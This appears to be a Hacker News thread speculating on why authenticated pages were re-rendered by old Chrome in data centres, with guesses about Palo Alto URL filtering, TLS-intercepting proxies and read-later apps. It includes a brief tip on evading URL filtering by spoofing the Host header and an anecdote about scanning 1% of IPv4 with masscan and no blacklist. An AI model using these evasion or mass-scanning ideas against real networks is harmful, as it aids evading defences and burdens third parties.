I found a few leads googling around Palo Alto Networks docs website:
- "Advanced URL Filtering" seems to have a feature where web content is either can be evaluated "inline" or "web payload data is also submitted to Advanced URL Filtering in the cloud" [1].
- If a URL is considered 2 spooky to load on the user's endpoint, it can instead be loaded via "Remote Browser Isolation" in a remote-desktop-like session, on demand, for that single page only [2].
I think either (or both) could explain the signals you're detecting.
Ex-PANW here. It's almost certainly the firewall's URL Filtering feature (aka PAN-DB).
When someone makes an HTTP request, the firewall takes the host and path from the request and looks them up first in a local cache on the data plane, then in the cloud. (As you can imagine, bypassing the entire feature is therefore trivial for malware. You just open a connection to an arbitrary IP address and put, say, google.com in the host header. As far as the firewall can tell, you are in fact talking to google.com.)
When the URL isn't already known to the cloud, or hasn't been visited more recently than its TTL, it goes into a queue to be refreshed by the crawler, which will make its way there shortly thereafter to classify the page.
Palo Alto has other URL scanners, but none that would reliably visit the page after the user. URLs carved out of SMTP traffic, for example, would mostly be visited before the real user, not after.
I remember setting up a Confluence server which was only used by me, but had public access (still password protected).
When checking the logs, I noticed an external IP trying to access pages which I had accessed previously, but they got redirected to the log-in page. The paths were very specific, some which I had bookmarked, so it was clear that there was an extension logging my browsing and some server or person then tried to access my pages.
> Dec. 28, 2023 Palo Alto Networks .. announced that it has completed the acquisition of Talon Cyber Security, a pioneer of enterprise browser technology ... Talon's Enterprise Browser will provide additional layers of protection against phishing attacks, web-based attacks and malicious browser extensions. Talon also offers extensive controls to help ensure that sensitive data does not escape the confines of the browser.
Set hyper-granular policies ... boundaries across all users, devices, apps, networks, locations, & assets
Log any and all browser behavior, review screenshots of critical actions, & trace incidents down to the click
Critical security tools embedded into the browser: like native browser isolation, automatic phishing protection, & web filtering
The usual way is to require a custom CA for all clients, sounds like an ineffective setup if you can just ignore it. I.e. it should be a intermediate certificate for the proxy you need to acknowledge.
It could be a chat preview generator. Users DM links to some internal project pages in an chat tool and the tool fetches the page in the background in an attempt to render a preview.
That was on my list of candidates as well! Those usually have a specific user agent making it clear what they are, they appear from a companies netblock (eg. Facebook, Microsoft) and cannot access authed pages (unless the key is in the url).
In this case these appeared to be all MitM'ed pages from a security device since the key wasn't in the url and it contained userids for a specific user.
In that case, the preview system would do (eg) GET https://example.com/private/page, but get a 401 Unauthorized response back, and have none of the page content or execute any of the scripts inlucded in that /private/page:
> * That somehow had the page content from a user
> * Would render and execute all scripts on that page as if it was that user
Same thing happened with my work computer in the office network with a MITM HTTPS firewall. The IP address jumps between the coasts randomly confusing the Windows weather widget. Images failing to load on a lot of websites because the IP address change triggers something in their CDN. Everything is working fine when I'm WFHing so it has to be the office network.
Oh and this can also happen when a mobile user is jumping off their home wifi network to a internationally roaming data card. Why they would do that? Because data is cheaper this way, or they are actually tourists. So please do not block users just because they are doing this teleportation dance.
My mail provider locked my account after I used the satellite internet on an intercontinental flight (my IP location must have bounced all over). Got a serious scare later at my hotel since pretty much all of my itinerary plans and details were kept there.
Thankfully that could be resolved, but it wasn't a great way to start a vacation.
Some other code running in the browser window (probably a browser extension, but possibly another script tag in the page, inserted by an intermediate firewall/proxy) is doing this. It could be corporate spyware (i.e. forced on users by the IT department), or an extension that only tends to be used by large institutions (because it relates to some expensive enterprise product). Alternatively, it could be a much more popular browser extension, but it only executes this capture when it determines that the user is within a target list of large institutions.
I'm making the same guess as the author about the execution process: that the code is shipping a huge amount of page content to a cloud server, e.g. the full DOM, and then rendering that DOM in this older Chrome version. It's not fetching the same page from the origin server, which is how it's able to do this without auth cookies.
As part of rendering, the page's script tags all get executed again, which is why Upollo is seeing this. (Note that I don't know if this re-execution of script tags is deliberate. There's a good chance that it's an unintended side-effect of loading the DOM into Chrome, but it doesn't seem to break anything so nobody's bothered to disable it.)
It's only sampling a small percentage of executions, which is why it's not continually happening for every interaction by these users.
It's waiting ten seconds so that the page's network interactions are likely to have finished by then. Waiting longer would increase the odds of the user navigating to another page before the code has had a chance to run.
The article doesn't say if there are particular kinds of pages being grabbed, but looking for commonality between them would help.
The main thing that stumps me – assuming I've understood it correctly – is why the second render is happening across such a diverse set of cloud networks.
Browser extension is what we originally thought for exactly the same reasons you did. We started to see some requests show up from iOS devices which didn't support extensions so that made us think MitM corporate proxies.
The diversity of cloud networks looks to be due to these being deployed by individual institutions (eg. universities, corporations etc.) rather than only run from Palo Alto Network's data centers.
We also saw slightly different configurations with different browser versions, but with the same pattern of behaviour.
"Palo Alto Networks" is something that shows up clearer than anything else in my lighttpd logs, as they include the "we're palo alto networks doing research, contact us here(email) for us not to scan" in http request headers. They appear to do full ipv4 range scan many times a day IIRC.
Funnily enough I got motivated to try to make my crawler show up the same way in my own server logs by just raw scan breadth, IE by hitting so many servers I'd see my own crawler in the logs without any kind of targeting. As a kind of "planetary level experiment" source of curiosity.
Had to tweak masscan settings till my crappy router could keep up with the routing load. Ended up with something like 500 addresses / sec, which pales in comparison to the best hardware used for this which when combined with masscan, scans the ipv4 space in 6 minutes.
Managed to scan 1% of the IPV4 space while I slept before I started to get seriously throttled and got a quite angry email from my ISP. Just told them "Oh thanks for noticing, I now fixed the offending device" (pressed Control+C) and never ran the scan again lol.
Ran the scan with masscan with no blacklist. Don't recommend, at least not doing it more than once unless you get a good blacklist to follow
> This is an Internet-scale port scanner. It can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second, from a single machine.
Aren't there systems where a server does the browsing and/or page rendering but it's controlled by terminals using other protocols?
Just speculatively, if someone was managing the setup of a room full of NSA analysts browsing for OSINT, how would they cover their tracks? What would that traffic look like?
It would look much like any other institution full of people doing general web browsing. A university full of foreign students googling stuff in thier home languages. A hospital full of patients googling about random stuff. An airport full of international passengers surfing twitter feeds for war news.
Sounds like it could easily be the Cisco umbrella junk a few gov/universities have had that I’ve seen. They install MITM CAs[0] on managed hardware so they can definitely see page content.
It appears this is to find threats that might have no otherwise triggered or work out is particular sites are dangerous without monitoring a users machine.
It is scary that for people in a corporate environment this could be rendering banking, messaging or any other pages contents.
I spoke w. a Palo Alto vendor rep a few months ago. We were talking about the features of the firewall appliance one of my clients was using.
They have a feature that effectively "tests" what the user is about to load in a virtual environment, and sees if that content behaves abnormally. I forgot what they called it. It sounds like this could be it.
Could it be a "read it later" type of article reader/storage service? I know of at least one that fits the bill in that it uploads locally-viewed HTML to a server which then renders that page in a headless Chrome instance for archival:
I've recently been wondering how Omnivore, unlike e.g. Pocket, is able to store paywalled content (for which I have a subscription) on iOS when saving it via the Omnivore app target in the share sheet, but not when directly pasting the target URL in the webapp or iOS app.
Turns out that sharing to an iOS app actually enables [1] the app to run JavaScript in the Safari web context of the displayed page, including cookies and everything!
If I'm skimming the client and server source code correctly, it does just that: It seems to serialize and upload the HTML of the page [2] and then invokes Puppeteer on the server [3]. Puppeteer is a scriptable/headless Chrome – that would fit the bill of "an outdated Chrome running in a data center"!
Omnivore can also be self-hosted since both client and server are open-source; that would explain you seeing multiple data center IPs.
I wonder if this could be iCloud Private Relay? It appears that it's effectively a VPN with some redirection layers that change often, though I don't know the exact details.
What's happening is that some MiTM Palo Alto networks system is intercepting the HTML contents of the page, waiting a bit, and then rendering that HTML content again in old Chrome on a separate machine. It's like if you go to a authenticated page that only you can see, like https://news.ycombinator.com/flagged?id=aaron695, did "View Source", copy-and-paste that source into a HTML file, and then you send me the HTML file and I open the HTML file on my computer.
jitl|2 years ago
- "Advanced URL Filtering" seems to have a feature where web content is either can be evaluated "inline" or "web payload data is also submitted to Advanced URL Filtering in the cloud" [1].
- If a URL is considered 2 spooky to load on the user's endpoint, it can instead be loaded via "Remote Browser Isolation" in a remote-desktop-like session, on demand, for that single page only [2].
I think either (or both) could explain the signals you're detecting.
[1]: https://docs.paloaltonetworks.com/advanced-url-filtering/adm....
[2]: https://docs.paloaltonetworks.com/advanced-url-filtering/adm...
caydenm|2 years ago
FreakLegion|2 years ago
When someone makes an HTTP request, the firewall takes the host and path from the request and looks them up first in a local cache on the data plane, then in the cloud. (As you can imagine, bypassing the entire feature is therefore trivial for malware. You just open a connection to an arbitrary IP address and put, say, google.com in the host header. As far as the firewall can tell, you are in fact talking to google.com.)
When the URL isn't already known to the cloud, or hasn't been visited more recently than its TTL, it goes into a queue to be refreshed by the crawler, which will make its way there shortly thereafter to classify the page.
Palo Alto has other URL scanners, but none that would reliably visit the page after the user. URLs carved out of SMTP traffic, for example, would mostly be visited before the real user, not after.
lxgr|2 years ago
qwertox|2 years ago
I remember setting up a Confluence server which was only used by me, but had public access (still password protected).
When checking the logs, I noticed an external IP trying to access pages which I had accessed previously, but they got redirected to the log-in page. The paths were very specific, some which I had bookmarked, so it was clear that there was an extension logging my browsing and some server or person then tried to access my pages.
transpute|2 years ago
https://www.paloaltonetworks.com/company/press/2023/palo-alt...
> Dec. 28, 2023 Palo Alto Networks .. announced that it has completed the acquisition of Talon Cyber Security, a pioneer of enterprise browser technology ... Talon's Enterprise Browser will provide additional layers of protection against phishing attacks, web-based attacks and malicious browser extensions. Talon also offers extensive controls to help ensure that sensitive data does not escape the confines of the browser.
https://www.island.io/product
runlevel1|2 years ago
Well that definitely tracks.
m463|2 years ago
My machine wanted me to accept a client certificate from palo alto networks.
I did not and kept refusing.
I think they had some sort of intrusive mitm proxy that filtered everything everyone was doing/browsing.
pastage|2 years ago
bloody-crow|2 years ago
caydenm|2 years ago
In this case these appeared to be all MitM'ed pages from a security device since the key wasn't in the url and it contained userids for a specific user.
jitl|2 years ago
> * That somehow had the page content from a user
> * Would render and execute all scripts on that page as if it was that user
gaudat|2 years ago
Oh and this can also happen when a mobile user is jumping off their home wifi network to a internationally roaming data card. Why they would do that? Because data is cheaper this way, or they are actually tourists. So please do not block users just because they are doing this teleportation dance.
ginko|2 years ago
Thankfully that could be resolved, but it wasn't a great way to start a vacation.
yoz|2 years ago
Some other code running in the browser window (probably a browser extension, but possibly another script tag in the page, inserted by an intermediate firewall/proxy) is doing this. It could be corporate spyware (i.e. forced on users by the IT department), or an extension that only tends to be used by large institutions (because it relates to some expensive enterprise product). Alternatively, it could be a much more popular browser extension, but it only executes this capture when it determines that the user is within a target list of large institutions.
I'm making the same guess as the author about the execution process: that the code is shipping a huge amount of page content to a cloud server, e.g. the full DOM, and then rendering that DOM in this older Chrome version. It's not fetching the same page from the origin server, which is how it's able to do this without auth cookies.
As part of rendering, the page's script tags all get executed again, which is why Upollo is seeing this. (Note that I don't know if this re-execution of script tags is deliberate. There's a good chance that it's an unintended side-effect of loading the DOM into Chrome, but it doesn't seem to break anything so nobody's bothered to disable it.)
It's only sampling a small percentage of executions, which is why it's not continually happening for every interaction by these users.
It's waiting ten seconds so that the page's network interactions are likely to have finished by then. Waiting longer would increase the odds of the user navigating to another page before the code has had a chance to run.
The article doesn't say if there are particular kinds of pages being grabbed, but looking for commonality between them would help.
The main thing that stumps me – assuming I've understood it correctly – is why the second render is happening across such a diverse set of cloud networks.
caydenm|2 years ago
The diversity of cloud networks looks to be due to these being deployed by individual institutions (eg. universities, corporations etc.) rather than only run from Palo Alto Network's data centers.
We also saw slightly different configurations with different browser versions, but with the same pattern of behaviour.
maxlin|2 years ago
Funnily enough I got motivated to try to make my crawler show up the same way in my own server logs by just raw scan breadth, IE by hitting so many servers I'd see my own crawler in the logs without any kind of targeting. As a kind of "planetary level experiment" source of curiosity.
Had to tweak masscan settings till my crappy router could keep up with the routing load. Ended up with something like 500 addresses / sec, which pales in comparison to the best hardware used for this which when combined with masscan, scans the ipv4 space in 6 minutes. Managed to scan 1% of the IPV4 space while I slept before I started to get seriously throttled and got a quite angry email from my ISP. Just told them "Oh thanks for noticing, I now fixed the offending device" (pressed Control+C) and never ran the scan again lol.
Ran the scan with masscan with no blacklist. Don't recommend, at least not doing it more than once unless you get a good blacklist to follow
internetter|2 years ago
> This is an Internet-scale port scanner. It can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second, from a single machine.
Absolutely insane
Sporktacular|2 years ago
Just speculatively, if someone was managing the setup of a room full of NSA analysts browsing for OSINT, how would they cover their tracks? What would that traffic look like?
sandworm101|2 years ago
pbnjay|2 years ago
[0] https://docs.umbrella.com/deployment-umbrella/docs/install-c...
Edited to add link to docs.
mattmmatthews|2 years ago
caydenm|2 years ago
It is scary that for people in a corporate environment this could be rendering banking, messaging or any other pages contents.
koliber|2 years ago
They have a feature that effectively "tests" what the user is about to load in a virtual environment, and sees if that content behaves abnormally. I forgot what they called it. It sounds like this could be it.
unknown|2 years ago
[deleted]
teekert|2 years ago
[0] https://en.wikipedia.org/wiki/Genesis_Market
admaiora|2 years ago
Maybe related somehow to that?
gmerc|2 years ago
nsonha|2 years ago
I don't know where the "security" bit comes from, but this is, to me, obviously web scrapping
matt3210|2 years ago
lxgr|2 years ago
I've recently been wondering how Omnivore, unlike e.g. Pocket, is able to store paywalled content (for which I have a subscription) on iOS when saving it via the Omnivore app target in the share sheet, but not when directly pasting the target URL in the webapp or iOS app.
Turns out that sharing to an iOS app actually enables [1] the app to run JavaScript in the Safari web context of the displayed page, including cookies and everything!
If I'm skimming the client and server source code correctly, it does just that: It seems to serialize and upload the HTML of the page [2] and then invokes Puppeteer on the server [3]. Puppeteer is a scriptable/headless Chrome – that would fit the bill of "an outdated Chrome running in a data center"!
Omnivore can also be self-hosted since both client and server are open-source; that would explain you seeing multiple data center IPs.
[1] https://developer.apple.com/library/archive/documentation/Ge...
[2] https://github.com/omnivore-app/omnivore/blob/main/apple/Sou...
[3] https://github.com/omnivore-app/omnivore/blob/57aca545388904...
mholm|2 years ago
jitl|2 years ago
> But wait, these are different devices, they have none of the same cookies. If this were a VPN it would be the same device.
rompledorph|2 years ago
nextlevelwizard|2 years ago
Could be interesting, but I cant read this shit with flashing images.
dag11|2 years ago
cypherpunks01|2 years ago
caydenm|2 years ago
farkanoid|2 years ago
vitiral|2 years ago
pronouncedjerry|2 years ago
aaron695|2 years ago
> strange devices show up for some of our customers' users
> how did it load these pages which were often behind an authwall without ever logging in or having auth cookies?
Either
- The customer has screwed up user auth big time and some X knows that.... lets go with no
- OP's data is wrong or they are reading it wrong
- They are explaining it badly.
jitl|2 years ago
unknown|2 years ago
[deleted]
jagged-chisel|2 years ago
meepmorp|2 years ago
FreeFull|2 years ago